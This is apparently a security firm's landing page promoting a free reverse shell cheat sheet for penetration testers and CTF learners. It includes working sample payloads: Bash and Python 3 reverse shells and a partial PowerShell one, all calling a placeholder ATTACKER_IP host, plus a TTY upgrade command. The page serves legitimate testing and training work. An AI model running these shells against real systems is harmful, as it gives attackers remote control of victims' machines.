The Reverse Shell Reference Every Pentester Keeps Open
Bash. Python. PHP. PowerShell. Netcat. Ruby. NodeJS. Shell upgrades. One clean PDF — built by NaviSec practitioners from real engagements. Free download.
What's Inside the Reverse Shell Reference?
A PDF covering every major reverse shell technique — formatted for quick reference during live engagements, CTFs, or labs.
- Bash reverse shell - One-liner shells for Linux targets
- Python reverse shell - Cross-platform reverse shell payloads
- PHP Variants - Three distinct PHP techniques
- NodeJS - JavaScript-based reverse shell
- PowerShell - Windows shells -- standard + base64 + binary exec
- Netcat & OpenSSL - nc traditional + encrypted OpenSSL variant
- Ruby & PERL - Scripting language shells
Every technique is tested. Copy-paste ready. No filler.
See What You're Getting
Here’s a sample from the pentester cheat sheet reference — The kind of clean, copy-paste ready syntax you’ll get across 12 techniques in the full PDF.
Bash TCP
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
Python 3
python3 -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("ATTACKER_IP",4444)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call(["/bin/sh","-i"])'
PowerShell
$c=New-Object System.Net.Sockets.TCPClient("ATTACKER_IP",4444);...
The full PDF includes 12+ techniques with syntax-highlighted code blocks, shell upgrade instructions, and usage notes.
Who it's for
Penetration Testers
Keep the reference open during engagements when you need a working shell fast, without breaking workflow to Google.
Security Students & CTF
Learning reverse shells for OSCP, HTB, THM or security certifications.
Red Team Operators
Covers Windows (PowerShell, binary exec) and Linux targets. The shell upgrade section handles interactive sessions post-exploitation.
Built by Penetration Testers for Penetration Testers
NaviSec is a Tampa-based offensive and defensive cyber security firm. Our engineers run penetration tests for Internal, External, Web Applications, IoT/Hardware devices, Physical security penetration testing, Red Team, Purple Team and more. NaviSec provides defensive services such as SOC/SIEM, Managed Detection and Response (MDR), and secure infrastructure design utilizing Fortinet and Cato Networks. We operate in nearly every industry including government, healthcare, finance, and manufacturing. We have pen tested jails, pasta factories and everything in between!
We have used this cheat sheet internally for many years and are releasing it now to the community. We will be releasing more content soon and will be better organizing or blogs. Stay tuned!
FRequently Asked Questions
Q: What is a reverse shell?
A reverse shell is a technique used in penetration testing where a target machine initiates a connection back to the attacker’s machine, giving the attacker remote command execution. Unlike a bind shell, the target reaches out — making it effective for bypassing inbound firewall rules on the target.
Q: What’s the difference between a reverse shell and a bind shell?
A bind shell opens a port on the target and waits for the attacker to connect. A reverse shell has the target connect back to the attacker. In external penetration testing, reverse shells are more reliable because outbound traffic is usually less restricted than inbound on target networks.
Q: Which reverse shell technique should I use?
It depends on what’s available on the target. Bash TCP is the go-to for Linux. PowerShell or the binary exec method works well on Windows. Python 3 is a reliable cross-platform fallback when scripting runtimes are available. The reference covers all major options so you can try alternatives quickly.
Q: How do I upgrade a reverse shell to a full TTY?
After catching a basic shell, you can upgrade it using the Python PTY method: python3 -c ‘import pty; pty.spawn(“/bin/bash”)’ — then background it, run “stty raw -echo; fg”, and set the terminal size. The full instructions are in the PDF.
Q: Is this reference free?
Yes. Enter your email above and we’ll send it directly to your inbox. No credit card, no catch. You’ll also receive occasional emails from NaviSec about new resources and guides — unsubscribe any time.
Q: Does NaviSec offer penetration testing services?
Yes. NaviSec provides Black Box and White Box penetration testing, Red Team engagements, and CMMC compliance operations. Visit navisec.io/services or contact us at sales@navisec.io to discuss an engagement.